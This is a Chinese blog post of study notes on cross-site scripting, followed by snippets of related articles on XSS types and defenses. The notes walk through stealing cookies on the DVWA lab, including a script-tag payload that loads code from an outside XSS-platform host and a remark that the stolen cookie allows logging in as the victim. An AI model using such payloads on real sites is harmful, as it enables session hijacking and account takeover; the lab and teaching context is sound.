XSS

最新推荐文章于 2023-06-17 20:35:08 发布
最新推荐文章于 2023-06-17 20:35:08 发布
阅读量202 收藏
点赞数 2
CC 4.0 BY-SA版权
分类专栏: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/wst0717/article/details/81571387

反射型xss

输入的参数带人了数据库进行了查询

但是并没有存入到数据库里面

存储型xss

输入的参数带人了数据库进行了查询

并存入到数据库里面

Html表单

javascript

JavaScript 被数百万计的网页用来改进设计、验证表单、检测浏览器、创建cookies,以及更多的应用。

 

<script>alert(document.cookie)</script>

是可以弹出cookie的用法

在显示cookie的地方加入Httponly属性就不会弹框了,也就不会打到cookie了

现在把打到的cookie发送到xss平台

Xss平台创建一个xss打cookie的项目

Dvwa低级别

我们来输入一个payload

 

script src=http://webxss.top/xss/2newbZ?1532658129></script>#

访问

我们就可以用这个别人的cookie来登录网站了

Firebug插件

编辑和重发

 

浏览器具备存储cookie的功能      

Xss是伪造cookie

Csrf是伪造的表单

 

Cookie存储在客户端(浏览器)

Session存在在服务器端

 

客户端浏览器访问服务器的时候,服务器把客户端信息以某种形式记录在服务器上。这就是Session。客户端浏览器再次访问时只需要从该Session中查找该客户的状态就可以了。

 

 

 

 

 

 

 

 

 

存储型xss_安全测试之XSS
weixin_39989159的博客
11-29 1727
安全测试之跨站脚本攻击(XSS)前言随着互联网的不断发展,web应用的互动性也越来越强。但正如一个硬币会有两面一样,在用户体验提升的同时安全风险也会跟着有所增加。今天,我们就来讲一讲web渗透中常见的一种攻击方式:XSS攻击。(一)什么是XSS攻击先上一段标准解释(摘自百度百科)。“XSS是跨站脚本攻击(Cross Site Scripting),为不和层叠样式表(Cascading Style ...
存储型XSS
weixin_45634365的博客
03-07 2721
一、XSS简介 XSS:用户输入的数据被当做代码执行 #JS代码被触发的三种情况 <script></script> <a herf=javascript:alert(1)></a> <img src=1 onerror=alert(1) /> XSS的三种类型: (1)反射型 (2)存储型 (3)Dom型 二、同源策略 浏览器的同源策略,限制了不同源的Js,对当前页面的资源和属性的权限。同源策略保护了a.com域名下的资源不被来自其他网页的脚本
网络安全从入门到精通(第七章-2)存储型XSS详解
划水的小白白
02-07 2106
本文内容: ~如何使用xss平台 ~存储型xss挖掘 ~存储型xss实战注意 每日一句: 安全的所有一切都是基于信任,而做安全的就是不信任一切, 对任何东西都不信任,任何地方都可能是你发挥的战场!
XSS类型
积累,在于坚持
01-18 1055
几种类型 1、反射型XSS 只是简单的把用户输入的数据“反射”给浏览器,即用户输入的参数直接输出到页面上 2、存储型XSS 把用户输入的数据“存储”在服务器上,这类XSS具有很强的稳定性。因此,存储型XSS也可以称之为“持久型XSS”,因为从效果上来看它存在的时间比较长。 3、DOM Based XSS 通过修改页面的DOM节点形成的XSS。也是反射型XSS的一种,因为形成原因比较特别
XSS漏洞详解
热门推荐
xcxhzjl的博客
11-18 2万+
一、XSS漏洞原理 XSS,即跨站脚本攻击,是指攻击者利用Web服务器中的应用程序或代码漏洞,在页面中嵌入客户端脚本(通常是一段由JavaScript编写的恶意代码,少数情况下还有ActionScript、VBScript等语言),当信任此Web服务器的用户访问Web站点中含有恶意脚本代码的页面或打开收到的URL链接时,用户浏览器会自动加载并执行该恶意代码,从而达到攻击的目的。 当应用程序没有对用户提交的内容进行验证和重新编码,而是直接呈现给网站的访问者时,就可能会触发XSS攻击。 二、XSS漏洞的危
存储型XSS简介
seek_2022的博客
05-05 1万+
文章目录一、存储型XSS简介(一)存储型XSS的概念(二)存储型XSS攻击过程(三)打XSS的潜在风险二、XSS平台使用方法三、靶场实战 一、存储型XSS简介 (一)存储型XSS的概念 存储型XSS又称持久型XSS,攻击脚本将被永久地存放在目标服务器的数据库或文件中,具有很高的隐蔽性。反射型XSS的被攻击对象一般是攻击者去寻找的,就比如说:一个攻击者想盗取A的账号,那么攻击者就可以将一个含有反射型XSS的特制URL链接发送给A,然后用花言巧语诱骗A点击链接。当A不小心点进去时,就会立即受到XSS攻击。这种
关于pdf文件xss攻击问题,配置xssFilter方法
12-21
PDF文件XSS攻击问题主要指的是攻击者通过构造恶意的PDF文档,利用其中的脚本语言功能,尝试在用户的浏览器上执行跨站脚本攻击(XSS)。这种攻击方式可能导致敏感信息泄露、用户权限滥用或其他安全风险。在SpringBoot...
xss payload.pdf
10-27
XSS攻击(跨站脚本攻击)是一种常见的网络攻击手段,攻击者通过在网页中注入恶意脚本代码,利用浏览器的漏洞来执行攻击者的恶意代码,从而对网站的正常功能造成干扰,窃取用户信息,或者对网站进行非法控制等。...
xss特殊字符拦截与过滤
04-01
XSS攻击是指攻击者通过在Web页面插入恶意脚本代码,当其他用户浏览这些页面时,嵌入其中的脚本就会执行,从而盗取用户信息或者篡改网页。本篇代码展示了如何通过编程手段拦截和过滤这些危险代码,保障Web应用程序的...
8、XSS 攻击的防御pdf资料
10-15
XSS(跨站脚本攻击)是网络安全领域中一种常见的攻击方式,主要利用JavaScript来实施恶意行为。这种攻击之所以称为XSS,是因为原本的缩写CSS与层叠样式表(Cascading Style Sheets)冲突,因此改用XSSXSS攻击的...
XSS—存储型xss
wwwwyyyrre的博客
06-17 3782
每当有用户访问包含恶意代码的页面时,就会触发代码的执行,从而达到攻击目的。有别于反射型XSS编写一次代码只能进行一次攻击的特点,存储型XSS的恶意脚本一旦存储到服务器端,就能多次被使用,称之为“持久型XSS”。存储型XSS比反射型XSS的危害更大,在于它不需要构造特殊的URL,用户访问的是一个正常的URL也可以被攻击;另一方面,它持久化在服务端,影响的范围可以比反射型XSS更广。一个重要条件是,web应用中的用户之间有一定的交互,而非各玩各的。比方说,博客、论坛等,。
一个存储型xss的bypass案例
Websec
03-03 2410
翻译: 原文地址:https://medium.com/bugbountywriteup/story-of-a-stored-xss-bypass-26e6659f807b 漏洞类型:存储型xss 作者:Prial Islam Khan …… 最近我在测试一个私人网站,在该网站中,用户可以添加他们的个人信息。我注意到一个名为Secret Key的输入,它允许用户处理付款并将交易信息...
XSS的类型详解
a_helloworlds的博客
03-28 2737
(1)反射型(reflected xss): 基于反射性攻击,依靠服务端反回的脚本,在客户端执行,形成web攻击。 发出请求时,XSS代码出现在URL中,作为输入提交到服务器端,服务器端解析后响应,XSS随响应内容一起返 回给浏览器,最后浏览器解析执行XSS代码,这个过程就像一次发射,所以叫反射型XSS。 例子: ...
整理常见的三种XSS攻击类型
Edon-Du的博客
06-07 2万+
什么是XSS? 简单的说就是没有做好校验,因为前端的用户输入的数据别人可以拦截,然后嵌入一些脚本代码或者其它的而达到不良的结果,有点类似与sql注入的攻击。 百科的一段介绍: XSS又叫CSS (Cross Site Script) ,跨站脚本攻击。它指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到...
第三节 前端开发基础——JavaScript
qq_33672321的博客
04-05 335
初级拓展1、测验        完成测验:http://www.w3school.com.cn/quiz/quiz.asp?quiz=js ;2、实践        1)相比html,javascript较为复杂。完成实例:http://www.w3school.com.cn/js/ ;        2)完成所有的“亲自试一试”(重点学习JS HTML DOM、JS Window部分);3、掌握...
存储型xss
baidu_41942652的博客
04-28 2082
首先打开pikachu测试平台,找到存储型xss章节。 先输入一段内容 发现存到了后台数据库里。 再次输入‘“<>?&666类似的控制字符。 发现也留在了后台数据库。 查看网站源码 可以找到,我们输入的内容以及写入前端的代码。 这样,我们创造一个合法的script语句,这里是一个弹窗 这里就发现弹出了弹窗,而且每次刷新都会出现弹窗。 这样,一次存储型xss测试就完成...
什么是 XSS 攻击,XSS有几种类型?
超域的博客
09-23 1万+
什么是 XSS 攻击 XSS(Cross-Site Scripting)又称跨站脚本,XSS的重点不在于跨站点,而是在于脚本的执行。XSS是一种经常出现在 Web 应用程序中的计算机安全漏洞,是由于 Web 应用程序对用户的输入过滤不足而产生的 常见的 XSS 攻击有三种:反射型、DOM-based 型、存储型。 其中反射型、DOM-based 型可以归类为非持久型 XSS 攻...
xss
最新发布
06-26
### XSS(跨站脚本攻击)的原理 XSS是一种常见的Web安全漏洞,其核心原理是攻击者通过在目标网站注入恶意脚本(通常是JavaScript),当其他用户访问该被注入恶意代码的页面时,这些恶意脚本会在用户的浏览器中执行。这种攻击方式利用了用户对目标网站的信任,使得恶意脚本在用户的浏览器环境中运行,从而达到窃取用户敏感信息、进行页面篡改、执行恶意操作等目的[^1]。 XSS属于客户端攻击,受害者最终是用户,但特别需要注意的是,网站管理人员也属于用户之一。这就意味着XSS可以用于“服务端”攻击,因为管理员通常拥有比普通用户更高的权限,攻击者可以通过管理员的身份作为跳板实施更深层次的攻击。XSS攻击的发生主要是由于程序员对参数输入和输出的控制不够严格,导致攻击者能够通过“精心构造”的脚本输入后,在输出到前端时被浏览器当作有效代码解析执行,从而产生危害[^2]。 ### XSS的类型 XSS攻击主要分为三种类型:存储型XSS、反射型XSS和DOM型XSS。 - **存储型XSS**:攻击者的恶意脚本被永久地存储在目标服务器上,如数据库、消息论坛、访客留言等。当其他用户请求包含这些数据的页面时,恶意脚本会被执行。这种方式的危害最大,因为它影响的是所有访问受影响页面的用户。 - **反射型XSS**:攻击者的恶意脚本被嵌入到URL中,通常通过电子邮件或其他方式诱导用户点击。当用户点击这个链接时,恶意脚本作为请求的一部分发送给服务器,然后被返回给用户的浏览器并执行。这种方式依赖于用户点击特定链接。 - **DOM型XSS**:这种类型的XSS不涉及服务器端的响应,而是由于客户端脚本修改了页面的DOM(文档对象模型)而导致的安全漏洞。攻击者的恶意脚本直接在用户的浏览器中执行,而不会与服务器交互[^3]。 ### XSS的防范方法 针对XSS攻击,有多种防范措施可以采取: - **输入验证**:对于所有来自外部的数据,都应该进行严格的验证,确保它们符合预期的格式和类型。例如,如果一个字段只应该包含数字,则应拒绝任何非数字字符的输入。 - **输出编码**:在将数据输出到HTML、JavaScript、CSS或URL上下文之前,应该对其进行适当的编码。这样可以防止数据中的特殊字符被解释为可执行的代码。 - **使用内容安全策略(CSP)**:通过设置HTTP头`Content-Security-Policy`,可以指示浏览器只加载和执行来自指定源的脚本,从而减少XSS攻击的风险。 - **避免内联脚本**:尽量避免在HTML中使用内联脚本,转而使用外部脚本文件。这有助于提高安全性,同时也便于维护。 - **使用安全的开发框架**:许多现代Web开发框架都内置了XSS防护机制,如自动的输出编码功能。合理利用这些工具可以帮助开发者更容易地构建安全的应用程序。 ```python # 示例:Python Flask框架中的转义函数 from flask import escape def safe_output(user_input): # 使用Flask的escape函数对用户输入进行HTML转义 return f"<p>您输入的内容是: {escape(user_input)}</p>" ``` 上述代码展示了如何在Python的Flask框架中使用`escape`函数来对用户输入进行HTML转义,以防止XSS攻击。 ### 相关问题 1. 如何检测Web应用是否存在XSS漏洞? 2. 有哪些工具可以帮助测试和防御XSS攻击? 3. 在实际开发中,如何平衡用户体验与XSS防护? 4. CSP(内容安全策略)是如何具体工作的?它有哪些局限性? 5. 对于已经遭受XSS攻击的网站,应该如何应对和恢复?
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值